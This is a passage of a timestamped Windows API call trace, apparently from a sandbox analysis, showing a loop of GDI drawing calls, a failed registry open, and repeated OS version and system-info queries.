AngleArc (hdc=0x0, x=0, y=0, r=0x32, StartAngle=0x0, SweepAngle=0x43960000) returned 0 [0090.721] BeginPaint (in: hWnd=0x0, lpPaint=0x1817cc | out: lpPaint=0x1817cc) returned 0x0 [0090.721] GetClientRect (in: hWnd=0x0, lpRect=0x1817ac | out: lpRect=0x1817ac) returned 0 [0090.721] GetWindowRect (in: hWnd=0x0, lpRect=0x18179c | out: lpRect=0x18179c) returned 0 [0090.721] GetWindowRect (in: hWnd=0x0, lpRect=0x18178c | out: lpRect=0x18178c) returned 0 [0090.722] RtlUnwind (TargetFrame=0x181840, TargetIp=0x5582fd98, ExceptionRecord=0x0, ReturnValue=0x0) [0090.722] RegOpenKeyExW (in: hKey=0x80000002, lpSubKey="SOFTWARE\\Microsoft\\MediaPlayer", ulOptions=0x0, samDesired=0x0, phkResult=0x181828 | out: phkResult=0x181828*=0x0) returned 0x5 [0090.722] CreateRectRgn (x1=0, y1=0, x2=10, y2=10) returned 0x600401d9 [0090.722] CreateRectRgn (x1=50, y1=50, x2=150, y2=150) returned 0x5e0401dc [0090.722] CreateRectRgn (x1=0, y1=0, x2=0, y2=0) returned 0x1045903 [0090.722] CreateRectRgn (x1=0, y1=0, x2=0, y2=0) returned 0x1045904 [0090.722] CombineRgn (hrgnDst=0x1045903, hrgnSrc1=0x600401d9, hrgnSrc2=0x5e0401dc, iMode=1) returned 1 [0090.722] CombineRgn (hrgnDst=0x1045904, hrgnSrc1=0x600401d9, hrgnSrc2=0x5e0401dc, iMode=4) returned 2 [0090.722] CreateSolidBrush (color=0xff) returned 0x2105902 [0090.722] CreateSolidBrush (color=0xff0000) returned 0x1105905 [0090.722] DeleteObject (ho=0x1105905) returned 1 [0090.722] DeleteObject (ho=0x5e0401dc) returned 1 [0090.722] DeleteObject (ho=0x600401d9) returned 1 [0090.722] GetVersionExA (in: lpVersionInformation=0x1816f0*(dwOSVersionInfoSize=0x9c, dwMajorVersion=0x0, dwMinorVersion=0x0, dwBuildNumber=0x0, dwPlatformId=0x0, szCSDVersion="") | out: lpVersionInformation=0x1816f0*(dwOSVersionInfoSize=0x9c, dwMajorVersion=0x6, dwMinorVersion=0x1, dwBuildNumber=0x1db1, dwPlatformId=0x2, szCSDVersion="Service Pack 1")) returned 1 [0090.722] GetSystemInfo (in: lpSystemInfo=0x1817e8 | out: lpSystemInfo=0x1817e8*(dwOemId=0x0, wProcessorArchitecture=0x0, wReserved=0x0, dwPageSize=0x1000, lpMinimumApplicationAddress=0x10000, lpMaximumApplicationAddress=0x7ffeffff, dwActiveProcessorMask=0x3, dwNumberOfProcessors=0x2, dwProcessorType=0x24a, dwAllocationGranularity=0x10000, wProcessorLevel=0x6, wProcessorRevision=0x5e03)) [0090.722] BeginPaint (in: hWnd=0x0, lpPaint=0x1817cc | out: lpPaint=0x1817cc) returned 0x0 [0090.722] SelectObject (hdc=0x0, h=0x0) returned 0x0 [0090.722] SetDCPenColor (hdc=0x0, color=0x0) returned 0xffffffff [0090.722] BeginPath (hdc=0x0) returned 0 [0090.722] MoveToEx (in: hdc=0x0, x=1903, y=187, lppt=0x0 | out: lppt=0x0) returned 0 [0090.722] AngleArc (hdc=0x0, x=0, y=0, r=0x32, StartAngle=0x0, SweepAngle=0x43960000) returned 0 [0090.722] BeginPaint (in: hWnd=0x0, lpPaint=0x1817cc | out: lpPaint=0x1817cc) returned 0x0 [0090.722] GetClientRect (in: hWnd=0x0, lpRect=0x1817ac | out: lpRect=0x1817ac) returned 0 [0090.722] GetWindowRect (in: hWnd=0x0, lpRect=0x18179c | out: lpRect=0x18179c) returned 0 [0090.722] GetWindowRect (in: hWnd=0x0, lpRect=0x18178c | out: lpRect=0x18178c) returned 0 [0090.722] RtlUnwind (TargetFrame=0x181840, TargetIp=0x5582fd98, ExceptionRecord=0x0, ReturnValue=0x0) [0090.723] RegOpenKeyExW (in: hKey=0x80000002, lpSubKey="SOFTWARE\\Microsoft\\MediaPlayer", ulOptions=0x0, samDesired=0x0, phkResult=0x181828 | out: phkResult=0x181828*=0x0) returned 0x5 [0090.723] CreateRectRgn (x1=0, y1=0, x2=10, y2=10) returned 0x5f0401dc [0090.723] CreateRectRgn (x1=50, y1=50, x2=150, y2=150) returned 0x610401d9 [0090.723] CreateRectRgn (x1=0, y1=0, x2=0, y2=0) returned 0x1045906 [0090.723] CreateRectRgn (x1=0, y1=0, x2=0, y2=0) returned 0x1045907 [0090.723] CombineRgn (hrgnDst=0x1045906, hrgnSrc1=0x5f0401dc, hrgnSrc2=0x610401d9, iMode=1) returned 1 [0090.723] CombineRgn (hrgnDst=0x1045907, hrgnSrc1=0x5f0401dc, hrgnSrc2=0x610401d9, iMode=4) returned 2 [0090.723] CreateSolidBrush (color=0xff) returned 0x2105905 [0090.723] CreateSolidBrush (color=0xff0000) returned 0x1105908 [0090.723] DeleteObject (ho=0x1105908) returned 1 [0090.723] DeleteObject (ho=0x610401d9) returned 1 [0090.723] DeleteObject (ho=0x5f0401dc) returned 1 [0090.723] GetVersionExA (in: lpVersionInformation=0x1816f0*(dwOSVersionInfoSize=0x9c, dwMajorVersion=0x0, dwMinorVersion=0x0, dwBuildNumber=0x0, dwPlatformId=0x0, szCSDVersion="") | out: lpVersionInformation=0x1816f0*(dwOSVersionInfoSize=0x9c, dwMajorVersion=0x6, dwMinorVersion=0x1, dwBuildNumber=0x1db1, dwPlatformId=0x2, szCSDVersion="Service Pack 1")) returned 1 [0090.723] GetSystemInfo (in: lpSystemInfo=0x1817e8 | out: lpSystemInfo=0x1817e8*(dwOemId=0x0, wProcessorArchitecture=0x0, wReserved=0x0, dwPageSize=0x1000, lpMinimumApplicationAddress=0x10000, lpMaximumApplicationAddress=0x7ffeffff, dwActiveProcessorMask=0x3, dwNumberOfProcessors=0x2, dwProcessorType=0x24a, dwAllocationGranularity=0x10000, wProcessorLevel=0x6, wProcessorRevision=0x5e03)) [0090.723] BeginPaint (in: hWnd=0x0, lpPaint=0x1817cc | out: lpPaint=0x1817cc) returned 0x0 [0090.723] SelectObject (hdc=0x0, h=0x0) returned 0x0 [0090.723] SetDCPenColor (hdc=0x0, color=0x0) returned 0xffffffff [0090.723] BeginPath (hdc=0x0) returned 0 [0090.723] MoveToEx (in: hdc=0x0, x=1903, y=187, lppt=0x0 | out: lppt=0x0) returned 0 [0090.723] AngleArc (hdc=0x0, x=0, y=0, r=0x32, StartAngle=0x0, SweepAngle=0x43960000) returned 0 [0090.723] BeginPaint (in: hWnd=0x0, lpPaint=0x1817cc | out: lpPaint=0x1817cc) returned 0x0 [0090.723] GetClientRect (in: hWnd=0x0, lpRect=0x1817ac | out: lpRect=0x1817ac) returned 0 [0090.723] GetWindowRect (in: hWnd=0x0, lpRect=0x18179c | out: lpRect=0x18179c) returned 0 [0090.723] GetWindowRect (in: hWnd=0x0, lpRect=0x18178c | out: lpRect=0x18178c) returned 0 [0090.723] RtlUnwind (TargetFrame=0x181840, TargetIp=0x5582fd98, ExceptionRecord=0x0, ReturnValue=0x0) [0090.723] RegOpenKeyExW (in: hKey=0x80000002, lpSubKey="SOFTWARE\\Microsoft\\MediaPlayer", ulOptions=0x0, samDesired=0x0, phkResult=0x181828 | out: phkResult=0x181828*=0x0) returned 0x5 [0090.724] CreateRectRgn (x1=0, y1=0, x2=10, y2=10) returned 0x620401d9 [0090.724] CreateRectRgn (x1=50, y1=50, x2=150, y2=150) returned 0x600401dc [0090.724] CreateRectRgn (x1=0, y1=0, x2=0, y2=0) returned 0x1045909 [0090.724] CreateRectRgn (x1=0, y1=0, x2=0, y2=0) returned 0x104590a [0090.724] CombineRgn (hrgnDst=0x1045909, hrgnSrc1=0x620401d9, hrgnSrc2=0x600401dc, iMode=1) returned 1 [0090.724] CombineRgn (hrgnDst=0x104590a, hrgnSrc1=0x620401d9, hrgnSrc2=0x600401dc, iMode=4) returned 2 [0090.724] CreateSolidBrush (color=0xff) returned 0x2105908 [0090.724] CreateSolidBrush (color=0xff0000) returned 0x110590b [0090.724] DeleteObject (ho=0x110590b) returned 1 [0090.724] DeleteObject (ho=0x600401dc) returned 1 [0090.724] DeleteObject (ho=0x620401d9) returned 1 [0090.724] GetVersionExA (in: lpVersionInformation=0x1816f0*(dwOSVersionInfoSize=0x9c, dwMajorVersion=0x0, dwMinorVersion=0x0, dwBuildNumber=0x0, dwPlatformId=0x0, szCSDVersion="") | out: lpVersionInformation=0x1816f0*(dwOSVersionInfoSize=0x9c, dwMajorVersion=0x6, dwMinorVersion=0x1, dwBuildNumber=0x1db1, dwPlatformId=0x2, szCSDVersion="Service Pack 1")) returned 1 [0090.724] GetSystemInfo (in: lpSystemInfo=0x1817e8 | out: lpSystemInfo=0x1817e8*(dwOemId=0x0, wProcessorArchitecture=0x0, wReserved=0x0, dwPageSize=0x1000, lpMinimumApplicationAddress=0x10000, lpMaximumApplicationAddress=0x7ffeffff, dwActiveProcessorMask=0x3, dwNumberOfProcessors=0x2, dwProcessorType=0x24a, dwAllocationGranularity=0x10000, wProcessorLevel=0x6, wProcessorRevision=0x5e03)) [0090.724] BeginPaint (in: hWnd=0x0, lpPaint=0x1817cc | out: lpPaint=0x1817cc) returned 0x0 [0090.724] SelectObject (hdc=0x0, h=0x0) returned 0x0 [0090.724] SetDCPenColor (hdc=0x0, color=0x0) returned 0xffffffff [0090.724] BeginPath (hdc=0x0) returned 0 [0090.724] MoveToEx (in: hdc=0x0, x=1903, y=187, lppt=0x0 | out: lppt=0x0) returned 0 [0090.724] AngleArc (hdc=0x0, x=0, y=0, r=0x32, StartAngle=0x0, SweepAngle=0x43960000) returned 0 [0090.724] BeginPaint (in: hWnd=0x0, lpPaint=0x1817cc | out: lpPaint=0x1817cc) returned 0x0 [0090.724] GetClientRect (in: hWnd=0x0, lpRect=0x1817ac | out: lpRect=0x1817ac) returned 0 [0090.724] GetWindowRect (in: hWnd=0x0, lpRect=0x18179c | out: lpRect=0x18179c) returned 0 [0090.724] GetWindowRect (in: hWnd=0x0, lpRect=0x18178c | out: lpRect=0x18178c) returned 0 [0090.724] RtlUnwind (TargetFrame=0x181840, TargetIp=0x5582fd98, ExceptionRecord=0x0, ReturnValue=0x0) [0090.724] RegOpenKeyExW (in: hKey=0x80000002, lpSubKey="SOFTWARE\\Microsoft\\MediaPlayer", ulOptions=0x0, samDesired=0x0, phkResult=0x181828 | out: phkResult=0x181828*=0x0) returned 0x5 [0090.724] CreateRectRgn (x1=0, y1=0, x2=10, y2=10) returned 0x610401dc [0090.725] CreateRectRgn (x1=50, y1=50, x2=150, y2=150) returned 0x630401d9 [0090.725] CreateRectRgn (x1=0, y1=0, x2=0, y2=0) returned 0x104590c [0090.725] CreateRectRgn (x1=0, y1=0, x2=0, y2=0) returned 0x104590d [0090.725] CombineRgn (hrgnDst=0x104590c, hrgnSrc1=0x610401dc, hrgnSrc2=0x630401d9, iMode=1) returned 1 [0090.725] CombineRgn (hrgnDst=0x104590d, hrgnSrc1=0x610401dc, hrgnSrc2=0x630401d9, iMode=4) returned 2 [0090.725] CreateSolidBrush (color=0xff) returned 0x210590b [0090.725] CreateSolidBrush (color=0xff0000) returned 0x110590e [0090.725] DeleteObject (ho=0x110590e) returned 1 [0090.725] DeleteObject (ho=0x630401d9) returned 1 [0090.725] DeleteObject (ho=0x610401dc) returned 1 [0090.725] GetVersionExA (in: lpVersionInformation=0x1816f0*(dwOSVersionInfoSize=0x9c, dwMajorVersion=0x0, dwMinorVersion=0x0, dwBuildNumber=0x0, dwPlatformId=0x0, szCSDVersion="") | out: lpVersionInformation=0x1816f0*(dwOSVersionInfoSize=0x9c, dwMajorVersion=0x6, dwMinorVersion=0x1, dwBuildNumber=0x1db1, dwPlatformId=0x2, szCSDVersion="Service Pack 1")) returned 1 [0090.725] GetSystemInfo (in: lpSystemInfo=0x1817e8 | out: lpSystemInfo=0x1817e8*(dwOemId=0x0, wProcessorArchitecture=0x0, wReserved=0x0, dwPageSize=0x1000, lpMinimumApplicationAddress=0x10000, lpMaximumApplicationAddress=0x7ffeffff, dwActiveProcessorMask=0x3, dwNumberOfProcessors=0x2, dwProcessorType=0x24a, dwAllocationGranularity=0x10000, wProcessorLevel=0x6, wProcessorRevision=0x5e03)) [0090.725] BeginPaint (in: hWnd=0x0, lpPaint=0x1817cc | out: lpPaint=0x1817cc) returned 0x0 [0090.725] SelectObject (hdc=0x0, h=0x0) returned 0x0 [0090.725] SetDCPenColor (hdc=0x0, color=0x0) returned 0xffffffff [0090.725] BeginPath (hdc=0x0) returned 0 [0090.725] MoveToEx (in: hdc=0x0, x=1903, y=187, lppt=0x0 | out: lppt=0x0) returned 0 [0090.725] AngleArc (hdc=0x0, x=0, y=0, r=0x32, StartAngle=0x0, SweepAngle=0x43960000) returned 0 [0090.725] BeginPaint (in: hWnd=0x0, lpPaint=0x1817cc | out: lpPaint=0x1817cc) returned 0x0 [0090.725] GetClientRect (in: hWnd=0x0, lpRect=0x1817ac | out: lpRect=0x1817ac) returned 0 [0090.725] GetWindowRect (in: hWnd=0x0, lpRect=0x18179c | out: lpRect=0x18179c) returned 0 [0090.725] GetWindowRect (in: hWnd=0x0, lpRect=0x18178c | out: lpRect=0x18178c) returned 0 [0090.725] RtlUnwind (TargetFrame=0x181840, TargetIp=0x5582fd98, ExceptionRecord=0x0, ReturnValue=0x0) [0090.725] RegOpenKeyExW (in: hKey=0x80000002, lpSubKey="SOFTWARE\\Microsoft\\MediaPlayer", ulOptions=0x0, samDesired=0x0, phkResult=0x181828 | out: phkResult=0x181828*=0x0) returned 0x5 [0090.725] CreateRectRgn (x1=0, y1=0, x2=10, y2=10) returned 0x640401d9 [0090.725] CreateRectRgn (x1=50, y1=50, x2=150, y2=150) returned 0x620401dc [0090.725] CreateRectRgn (x1=0, y1=0, x2=0, y2=0) returned 0x104590f [0090.725] CreateRectRgn (x1=0, y1=0, x2=0, y2=0) returned 0x1045910 [0090.726] CombineRgn (hrgnDst=0x104590f, hrgnSrc1=0x640401d9, hrgnSrc2=0x620401dc, iMode=1) returned 1 [0090.726] CombineRgn (hrgnDst=0x1045910, hrgnSrc1=0x640401d9, hrgnSrc2=0x620401dc, iMode=4) returned 2 [0090.726] CreateSolidBrush (color=0xff) returned 0x210590e [0090.726] CreateSolidBrush (color=0xff0000) returned 0x1105911 [0090.726] DeleteObject (ho=0x1105911) returned 1 [0090.726] DeleteObject (ho=0x620401dc) returned 1 [0090.726] DeleteObject (ho=0x640401d9) returned 1 [0090.726] GetVersionExA (in: lpVersionInformation=0x1816f0*(dwOSVersionInfoSize=0x9c, dwMajorVersion=0x0, dwMinorVersion=0x0, dwBuildNumber=0x0, dwPlatformId=0x0, szCSDVersion="") | out: lpVersionInformation=0x1816f0*(dwOSVersionInfoSize=0x9c, dwMajorVersion=0x6, dwMinorVersion=0x1, dwBuildNumber=0x1db1, dwPlatformId=0x2, szCSDVersion="Service Pack 1")) returned 1 [0090.726] GetSystemInfo (in: lpSystemInfo=0x1817e8 | out: lpSystemInfo=0x1817e8*(dwOemId=0x0, wProcessorArchitecture=0x0, wReserved=0x0, dwPageSize=0x1000, lpMinimumApplicationAddress=0x10000, lpMaximumApplicationAddress=0x7ffeffff, dwActiveProcessorMask=0x3, dwNumberOfProcessors=0x2, dwProcessorType=0x24a, dwAllocationGranularity=0x10000, wProcessorLevel=0x6, wProcessorRevision=0x5e03)) [0090.726] BeginPaint (in: hWnd=0x0, lpPaint=0x1817cc | out: lpPaint=0x1817cc) returned 0x0 [0090.726] SelectObject (hdc=0x0, h=0x0) returned 0x0 [0090.726] SetDCPenColor (hdc=0x0, color=0x0) returned 0xffffffff [0090.726] BeginPath (hdc=0x0) returned 0 [0090.726] MoveToEx (in: hdc=0x0, x=1903, y=187, lppt=0x0 | out: lppt=0x0) returned 0 [0090.726] AngleArc (hdc=0x0, x=0, y=0, r=0x32, StartAngle=0x0, SweepAngle=0x43960000) returned 0 [0090.726] BeginPaint (in: hWnd=0x0, lpPaint=0x1817cc | out: lpPaint=0x1817cc) returned 0x0 [0090.726] GetClientRect (in: hWnd=0x0, lpRect=0x1817ac | out: lpRect=0x1817ac) returned 0 [0090.726] GetWindowRect (in: hWnd=0x0, lpRect=0x18179c | out: lpRect=0x18179c) returned 0 [0090.726] GetWindowRect (in: hWnd=0x0, lpRect=0x18178c | out: lpRect=0x18178c) returned 0 [0090.726] RtlUnwind (TargetFrame=0x181840, TargetIp=0x5582fd98, ExceptionRecord=0x0, ReturnValue=0x0) [0090.726] RegOpenKeyExW (in: hKey=0x80000002, lpSubKey="SOFTWARE\\Microsoft\\MediaPlayer", ulOptions=0x0, samDesired=0x0, phkResult=0x181828 | out: phkResult=0x181828*=0x0) returned 0x5 [0090.726] CreateRectRgn (x1=0, y1=0, x2=10, y2=10) returned 0x630401dc [0090.726] CreateRectRgn (x1=50, y1=50, x2=150, y2=150) returned 0x650401d9 [0090.726] CreateRectRgn (x1=0, y1=0, x2=0, y2=0) returned 0x1045912 [0090.726] CreateRectRgn (x1=0, y1=0, x2=0, y2=0) returned 0x1045913 [0090.726] CombineRgn (hrgnDst=0x1045912, hrgnSrc1=0x630401dc, hrgnSrc2=0x650401d9, iMode=1) returned 1 [0090.727] CombineRgn (hrgnDst=0x1045913, hrgnSrc1=0x630401dc, hrgnSrc2=0x650401d9, iMode=4) returned 2 [0090.727] CreateSolidBrush (color=0xff) returned 0x2105911 [0090.727] CreateSolidBrush (color=0xff0000) returned 0x1105914 [0090.727] DeleteObject (ho=0x1105914) returned 1 [0090.727] DeleteObject (ho=0x650401d9) returned 1 [0090.727] DeleteObject (ho=0x630401dc) returned 1 [0090.727] GetVersionExA (in: lpVersionInformation=0x1816f0*(dwOSVersionInfoSize=0x9c, dwMajorVersion=0x0, dwMinorVersion=0x0, dwBuildNumber=0x0, dwPlatformId=0x0, szCSDVersion="") | out: lpVersionInformation=0x1816f0*(dwOSVersionInfoSize=0x9c, dwMajorVersion=0x6, dwMinorVersion=0x1, dwBuildNumber=0x1db1, dwPlatformId=0x2, szCSDVersion="Service Pack 1")) returned 1 [0090.727] GetSystemInfo (in: lpSystemInfo=0x1817e8 | out: lpSystemInfo=0x1817e8*(dwOemId=0x0, wProcessorArchitecture=0x0, wReserved=0x0, dwPageSize=0x1000, lpMinimumApplicationAddress=0x10000, lpMaximumApplicationAddress=0x7ffeffff, dwActiveProcessorMask=0x3, dwNumberOfProcessors=0x2, dwProcessorType=0x24a, dwAllocationGranularity=0x10000, wProcessorLevel=0x6, wProcessorRevision=0x5e03)) [0090.727] BeginPaint (in: hWnd=0x0, lpPaint=0x1817cc | out: lpPaint=0x1817cc) returned 0x0 [0090.727] SelectObject (hdc=0x0, h=0x0) returned 0x0 [0090.727] SetDCPenColor (hdc=0x0, color=0x0) returned 0xffffffff [0090.727] BeginPath (hdc=0x0) returned 0 [0090.727] MoveToEx (in: hdc=0x0, x=1903, y=187, lppt=0x0 | out: lppt=0x0) returned 0 [0090.727] AngleArc (hdc=0x0, x=0, y=0, r=0x32, StartAngle=0x0, SweepAngle=0x43960000) returned 0 [0090.727] BeginPaint (in: hWnd=0x0, lpPaint=0x1817cc | out: lpPaint=0x1817cc) returned 0x0 [0090.727] GetClientRect (in: hWnd=0x0, lpRect=0x1817ac | out: lpRect=0x1817ac) returned 0 [0090.727] GetWindowRect (in: hWnd=0x0, lpRect=0x18179c | out: lpRect=0x18179c) returned 0 [0090.727] GetWindowRect (in: hWnd=0x0, lpRect=0x18178c | out: lpRect=0x18178c) returned 0 [0090.727] RtlUnwind (TargetFrame=0x181840, TargetIp=0x5582fd98, ExceptionRecord=0x0, ReturnValue=0x0) [0090.727] RegOpenKeyExW (in: hKey=0x80000002, lpSubKey="SOFTWARE\\Microsoft\\MediaPlayer", ulOptions=0x0, samDesired=0x0, phkResult=0x181828 | out: phkResult=0x181828*=0x0) returned 0x5 [0090.727] CreateRectRgn (x1=0, y1=0, x2=10, y2=10) returned 0x660401d9 [0090.727] CreateRectRgn (x1=50, y1=50, x2=150, y2=150) returned 0x640401dc [0090.727] CreateRectRgn (x1=0, y1=0, x2=0, y2=0) returned 0x1045915 [0090.727] CreateRectRgn (x1=0, y1=0, x2=0, y2=0) returned 0x1045916 [0090.727] CombineRgn (hrgnDst=0x1045915, hrgnSrc1=0x660401d9, hrgnSrc2=0x640401dc, iMode=1) returned 1 [0090.727] CombineRgn (hrgnDst=0x1045916, hrgnSrc1=0x660401d9, hrgnSrc2=0x640401dc, iMode=4) returned 2 [0090.727] CreateSolidBrush (color=0xff) returned 0x2105914 [0090.727] CreateSolidBrush (color=0xff0000) returned 0x1105917 [0090.728] DeleteObject (ho=0x1105917) returned 1 [0090.728] DeleteObject (ho=0x640401dc) returned 1 [0090.728] DeleteObject (ho=0x660401d9) returned 1 [0090.728] GetVersionExA (in: lpVersionInformation=0x1816f0*(dwOSVersionInfoSize=0x9c, dwMajorVersion=0x0, dwMinorVersion=0x0, dwBuildNumber=0x0, dwPlatformId=0x0, szCSDVersion="") | out: lpVersionInformation=0x1816f0*(dwOSVersionInfoSize=0x9c, dwMajorVersion=0x6, dwMinorVersion=0x1, dwBuildNumber=0x1db1, dwPlatformId=0x2, szCSDVersion="Service Pack 1")) returned 1 [0090.728] GetSystemInfo (in: lpSystemInfo=0x1817e8 | out: lpSystemInfo=0x1817e8*(dwOemId=0x0, wProcessorArchitecture=0x0, wReserved=0x0, dwPageSize=0x1000, lpMinimumApplicationAddress=0x10000, lpMaximumApplicationAddress=0x7ffeffff, dwActiveProcessorMask=0x3, dwNumberOfProcessors=0x2, dwProcessorType=0x24a, dwAllocationGranularity=0x10000, wProcessorLevel=0x6, wProcessorRevision=0x5e03)) [0090.728] BeginPaint (in: hWnd=0x0, lpPaint=0x1817cc | out: lpPaint=0x1817cc) returned 0x0 [0090.728] SelectObject (hdc=0x0, h=0x0) returned 0x0 [0090.728] SetDCPenColor (hdc=0x0, color=0x0) returned 0xffffffff [0090.728] BeginPath (hdc=0x0) returned 0 [0090.728] MoveToEx (in: hdc=0x0, x=1903, y=187, lppt=0x0 | out: lppt=0x0) returned 0 [0090.728] AngleArc (hdc=0x0, x=0, y=0, r=0x32, StartAngle=0x0, SweepAngle=0x43960000) returned 0 [0090.728] BeginPaint (in: hWnd=0x0, lpPaint=0x1817cc | out: lpPaint=0x1817cc) returned 0x0 [0090.728] GetClientRect (in: hWnd=0x0, lpRect=0x1817ac | out: lpRect=0x1817ac) returned 0 [0090.728] GetWindowRect (in: hWnd=0x0, lpRect=0x18179c | out: lpRect=0x18179c) returned 0 [0090.728] GetWindowRect (in: hWnd=0x0, lpRect=0x18178c | out: lpRect=0x18178c) returned 0 [0090.728] RtlUnwind (TargetFrame=0x181840, TargetIp=0x5582fd98, ExceptionRecord=0x0, ReturnValue=0x0) [0090.728] RegOpenKeyExW (in: hKey=0x80000002, lpSubKey="SOFTWARE\\Microsoft\\MediaPlayer", ulOptions=0x0, samDesired=0x0, phkResult=0x181828 | out: phkResult=0x181828*=0x0) returned 0x5 [0090.728] CreateRectRgn (x1=0, y1=0, x2=10, y2=10) returned 0x650401dc [0090.728] CreateRectRgn (x1=50, y1=50, x2=150, y2=150) returned 0x670401d9 [0090.728] CreateRectRgn (x1=0, y1=0, x2=0, y2=0) returned 0x1045918 [0090.728] CreateRectRgn (x1=0, y1=0, x2=0, y2=0) returned 0x1045919 [0090.728] CombineRgn (hrgnDst=0x1045918, hrgnSrc1=0x650401dc, hrgnSrc2=0x670401d9, iMode=1) returned 1 [0090.728] CombineRgn (hrgnDst=0x1045919, hrgnSrc1=0x650401dc, hrgnSrc2=0x670401d9, iMode=4) returned 2 [0090.728] CreateSolidBrush (color=0xff) returned 0x2105917 [0090.728] CreateSolidBrush (color=0xff0000) returned 0x110591a [0090.728] DeleteObject (ho=0x110591a) returned 1 [0090.728] DeleteObject (ho=0x670401d9) returned 1 [0090.728] DeleteObject (ho=0x650401dc) returned 1 [0090.728] GetVersionExA (in: lpVersionInformation=0x1816f0*(dwOSVersionInfoSize=0x9c, dwMajorVersion=0x0, dwMinorVersion=0x0, dwBuildNumber=0x0, dwPlatformId=0x0, szCSDVersion="") | out: lpVersionInformation=0x1816f0*(dwOSVersionInfoSize=0x9c, dwMajorVersion=0x6, dwMinorVersion=0x1, dwBuildNumber=0x1db1, dwPlatformId=0x2, szCSDVersion="Service Pack 1")) returned 1 [0090.729] GetSystemInfo (in: lpSystemInfo=0x1817e8 | out: lpSystemInfo=0x1817e8*(dwOemId=0x0, wProcessorArchitecture=0x0, wReserved=0x0, dwPageSize=0x1000, lpMinimumApplicationAddress=0x10000, lpMaximumApplicationAddress=0x7ffeffff, dwActiveProcessorMask=0x3, dwNumberOfProcessors=0x2, dwProcessorType=0x24a, dwAllocationGranularity=0x10000, wProcessorLevel=0x6, wProcessorRevision=0x5e03)) [0090.729] BeginPaint (in: hWnd=0x0, lpPaint=0x1817cc | out: lpPaint=0x1817cc) returned 0x0 [0090.729] SelectObject (hdc=0x0, h=0x0) returned 0x0 [0090.729] SetDCPenColor (hdc=0x0, color=0x0) returned 0xffffffff [0090.729] BeginPath (hdc=0x0) returned 0 [0090.729] MoveToEx (in: hdc=0x0, x=1903, y=187, lppt=0x0 | out: lppt=0x0) returned 0 [0090.729] AngleArc (hdc=0x0, x=0, y=0, r=0x32, StartAngle=0x0, SweepAngle=0x43960000) returned 0 [0090.729] BeginPaint (in: hWnd=0x0, lpPaint=0x1817cc | out: lpPaint=0x1817cc) returned 0x0 [0090.729] GetClientRect (in: hWnd=0x0, lpRect=0x1817ac | out: lpRect=0x1817ac) returned 0 [0090.729] GetWindowRect (in: hWnd=0x0, lpRect=0x18179c | out: lpRect=0x18179c) returned 0 [0090.729] GetWindowRect (in: hWnd=0x0, lpRect=0x18178c | out: lpRect=0x18178c) returned 0 [0090.729] RtlUnwind (TargetFrame=0x181840, TargetIp=0x5582fd98, ExceptionRecord=0x0, ReturnValue=0x0) [0090.729] RegOpenKeyExW (in: hKey=0x80000002, lpSubKey="SOFTWARE\\Microsoft\\MediaPlayer", ulOptions=0x0, samDesired=0x0, phkResult=0x181828 | out: phkResult=0x181828*=0x0) returned 0x5 [0090.729] CreateRectRgn (x1=0, y1=0, x2=10, y2=10) returned 0x680401d9 [0090.729] CreateRectRgn (x1=50, y1=50, x2=150, y2=150) returned 0x660401dc [0090.729] CreateRectRgn (x1=0, y1=0, x2=0, y2=0) returned 0x104591b [0090.729] CreateRectRgn (x1=0, y1=0, x2=0, y2=0) returned 0x104591c [0090.729] CombineRgn (hrgnDst=0x104591b, hrgnSrc1=0x680401d9, hrgnSrc2=0x660401dc, iMode=1) returned 1 [0090.729] CombineRgn (hrgnDst=0x104591c, hrgnSrc1=0x680401d9, hrgnSrc2=0x660401dc, iMode=4) returned 2 [0090.729] CreateSolidBrush (color=0xff) returned 0x210591a [0090.729] CreateSolidBrush (color=0xff0000) returned 0x110591d [0090.729] DeleteObject (ho=0x110591d) returned 1 [0090.729] DeleteObject (ho=0x660401dc) returned 1 [0090.729] DeleteObject (ho=0x680401d9) returned 1 [0090.729] GetVersionExA (in: lpVersionInformation=0x1816f0*(dwOSVersionInfoSize=0x9c, dwMajorVersion=0x0, dwMinorVersion=0x0, dwBuildNumber=0x0, dwPlatformId=0x0, szCSDVersion="") | out: lpVersionInformation=0x1816f0*(dwOSVersionInfoSize=0x9c, dwMajorVersion=0x6, dwMinorVersion=0x1, dwBuildNumber=0x1db1, dwPlatformId=0x2, szCSDVersion="Service Pack 1")) returned 1 [0090.729] GetSystemInfo (in: lpSystemInfo=0x1817e8 | out: lpSystemInfo=0x1817e8*(dwOemId=0x0, wProcessorArchitecture=0x0, wReserved=0x0, dwPageSize=0x1000, lpMinimumApplicationAddress=0x10000, lpMaximumApplicationAddress=0x7ffeffff, dwActiveProcessorMask=0x3, dwNumberOfProcessors=0x2, dwProcessorType=0x24a, dwAllocationGranularity=0x10000, wProcessorLevel=0x6, wProcessorRevision=0x5e03)) [0090.729] BeginPaint (in: hWnd=0x0, lpPaint=0x1817cc | out: lpPaint=0x1817cc) returned 0x0 [0090.729] SelectObject (hdc=0x0, h=0x0) returned 0x0 [0090.730] SetDCPenColor (hdc=0x0, color=0x0) returned 0xffffffff [0090.730] BeginPath (hdc=0x0) returned 0 [0090.730] MoveToEx (in: hdc=0x0, x=1903, y=187, lppt=0x0 | out: lppt=0x0) returned 0 [0090.730] AngleArc (hdc=0x0, x=0, y=0, r=0x32, StartAngle=0x0, SweepAngle=0x43960000) returned 0 [0090.730] BeginPaint (in: hWnd=0x0, lpPaint=0x1817cc | out: lpPaint=0x1817cc) returned 0x0 [0090.730] GetClientRect (in: hWnd=0x0, lpRect=0x1817ac | out: lpRect=0x1817ac) returned 0 [0090.730] GetWindowRect (in: hWnd=0x0, lpRect=0x18179c | out: lpRect=0x18179c) returned 0 [0090.730] GetWindowRect (in: hWnd=0x0, lpRect=0x18178c | out: lpRect=0x18178c) returned 0 [0090.730] RtlUnwind (TargetFrame=0x181840, TargetIp=0x5582fd98, ExceptionRecord=0x0, ReturnValue=0x0) [0090.730] RegOpenKeyExW (in: hKey=0x80000002, lpSubKey="SOFTWARE\\Microsoft\\MediaPlayer", ulOptions=0x0, samDesired=0x0, phkResult=0x181828 | out: phkResult=0x181828*=0x0) returned 0x5 [0090.730] CreateRectRgn (x1=0, y1=0, x2=10, y2=10) returned 0x670401dc [0090.730] CreateRectRgn (x1=50, y1=50, x2=150, y2=150) returned 0x690401d9 [0090.730] CreateRectRgn (x1=0, y1=0, x2=0, y2=0) returned 0x104591e [0090.730] CreateRectRgn (x1=0, y1=0, x2=0, y2=0) returned 0x104591f [0090.730] CombineRgn (hrgnDst=0x104591e, hrgnSrc1=0x670401dc, 